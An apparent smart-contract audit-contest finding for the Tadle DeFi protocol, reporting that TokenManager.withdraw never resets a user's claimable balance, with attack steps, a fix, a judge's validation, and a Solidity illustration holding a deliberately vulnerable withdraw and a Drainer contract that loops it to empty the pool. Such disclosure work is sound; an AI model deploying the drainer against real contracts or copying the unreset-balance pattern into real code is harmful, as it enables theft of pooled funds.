Tadle
DeFi
30,000 USDC
Submission Details
Severity: high
Valid

Users can withdraw as much as they want

## Summary
Any user who has been credited a claimable balance can withdraw it an unlimited number of times: `withdraw` in the `TokenManager` contract pays out the amount stored in `userTokenBalanceMap` but never zeroes that entry, so a single legitimate credit is enough to drain the capital pool.
## Vulnerability Details
`withdraw` in the `TokenManager` contract reads the caller's claimable amount from `userTokenBalanceMap` (keyed by user, token and balance type) and transfers that amount out of the capital pool, but the mapping entry is neither decremented nor reset afterwards. Every subsequent call therefore reads the same claimable amount and pays it out again.
Attack Vector:
1. The attacker creates an offer and deposits 1 ETH into the capital pool.
2. The attacker cancels the offer, which credits the refund for later withdrawal: `userTokenBalanceMap[_msgSender()][wrappedNativeToken][MakerRefund] = 1 ether`.
3. The attacker calls `withdraw(wrappedNativeToken, MakerRefund)` repeatedly. Each call pulls another 1 ETH out of the capital pool because the entry still reads `1 ether`, and the loop only stops once the capital pool's balance falls below 1 ETH.
The same scenario applies to ERC20 tokens held by the capital pool, since the same mapping entry gates those withdrawals.
## Impact
All funds held by the capital pool, both wrapped native token and every ERC20 token it escrows, can be drained by any user who obtains a single refund credit.
## Tools Used
Manual Review
## Recommendations
In `withdraw`, set the caller's `userTokenBalanceMap` entry for that token and balance type to zero before performing the transfer (checks-effects-interactions). A repeated or reentrant call then reads a zero claimable amount and returns without paying anything.
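The following is an added illustration of the pattern, not Tadle's code and not the submitter's proof of concept. The contract names (`CapitalPoolStub`, `TokenManagerBase`, `VulnerableTokenManager`, `FixedTokenManager`, `Drainer`), the helper functions `creditRefund` and `approveManager`, the `TokenBalanceType` members, and the ERC20 pull-from-pool transfer are all assumptions chosen to mirror the finding; the stub pool deliberately grants the allowance that the judge notes is missing in the real contracts, so the drain can be shown end to end. The vulnerable `withdraw` sits beside the hardened one, and `Drainer.drain` works against either: it keeps calling `withdraw` while each call still moves tokens, so it empties the vulnerable pool and stops after one payout against the fixed one.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative reconstruction only; not Tadle's code. Names, enum members and
// the pull-from-pool transfer are assumptions made to mirror the finding.

interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
}

enum TokenBalanceType { TaxIncome, ReferralBonus, SalesRevenue, RemainingCash, MakerRefund }

// Hypothetical escrow pool. It hands the manager an allowance so the drain can
// be demonstrated; the judge notes the real pool lacked this approval.
contract CapitalPoolStub {
    function approveManager(address token, address manager) external {
        IERC20(token).approve(manager, type(uint256).max);
    }
}

abstract contract TokenManagerBase {
    // user => token => balance type => claimable amount
    mapping(address => mapping(address => mapping(TokenBalanceType => uint256)))
        public userTokenBalanceMap;
    address public immutable capitalPool;

    constructor(address _capitalPool) { capitalPool = _capitalPool; }

    // Stand-in for the credit that cancelling an offer would grant. Left
    // unrestricted here only so the scenario can be set up in a test.
    function creditRefund(address user, address token, uint256 amount) external {
        userTokenBalanceMap[user][token][TokenBalanceType.MakerRefund] += amount;
    }

    function withdraw(address token, TokenBalanceType balanceType) external virtual;
}

// The pattern described in the finding: the claimable amount is read and paid
// out of the pool, but the entry is never zeroed, so every call pays it again.
contract VulnerableTokenManager is TokenManagerBase {
    constructor(address _pool) TokenManagerBase(_pool) {}

    function withdraw(address token, TokenBalanceType balanceType) external override {
        uint256 claimable = userTokenBalanceMap[msg.sender][token][balanceType];
        if (claimable == 0) return;
        // BUG: no `userTokenBalanceMap[msg.sender][token][balanceType] = 0` here.
        IERC20(token).transferFrom(capitalPool, msg.sender, claimable);
    }
}

// Hardened form: zero the entry before the external call, so a second call
// (or a reentrant one) reads 0 and returns without paying.
contract FixedTokenManager is TokenManagerBase {
    constructor(address _pool) TokenManagerBase(_pool) {}

    function withdraw(address token, TokenBalanceType balanceType) external override {
        uint256 claimable = userTokenBalanceMap[msg.sender][token][balanceType];
        if (claimable == 0) return;
        userTokenBalanceMap[msg.sender][token][balanceType] = 0; // effects before interaction
        IERC20(token).transferFrom(capitalPool, msg.sender, claimable);
    }
}

// Attacker: after one legitimate MakerRefund credit, call `withdraw` in a loop
// for as long as each call still moves tokens into this contract.
contract Drainer {
    function drain(TokenManagerBase manager, IERC20 token) external returns (uint256 pulled) {
        address pool = manager.capitalPool();
        uint256 claimable = manager.userTokenBalanceMap(
            address(this), address(token), TokenBalanceType.MakerRefund
        );
        require(claimable > 0, "nothing credited");
        while (token.balanceOf(pool) >= claimable) {
            uint256 before = token.balanceOf(address(this));
            manager.withdraw(address(token), TokenBalanceType.MakerRefund);
            uint256 got = token.balanceOf(address(this)) - before;
            if (got == 0) break; // FixedTokenManager: entry already zeroed, stop
            pulled += got;      // VulnerableTokenManager: same amount, again and again
        }
    }
}
```

To reproduce in a Foundry or Hardhat test: deploy a mock ERC20 and the `CapitalPoolStub`, mint the pool a large balance, deploy `VulnerableTokenManager(pool)`, call `pool.approveManager(token, manager)`, credit the `Drainer` once with `creditRefund(drainer, token, 1e18)`, then call `drainer.drain(manager, token)`; `pulled` ends up equal to the pool's whole balance rounded down to a multiple of the credit. Swapping in `FixedTokenManager` makes `pulled` exactly `1e18`.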
Updates

Lead Judging Commences

0xnevi Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-TokenManager-withdraw-userTokenBalanceMap-not-reset

Valid critical severity finding: the lack of clearance of the `userTokenBalanceMap` mapping allows complete draining of the CapitalPool contract. Note: this would require the approval issues highlighted in other issues to be fixed first (i.e. the wrong approval address within `_transfer` and the lack of approvals within `_safe_transfer_from` during ERC20 withdrawals).
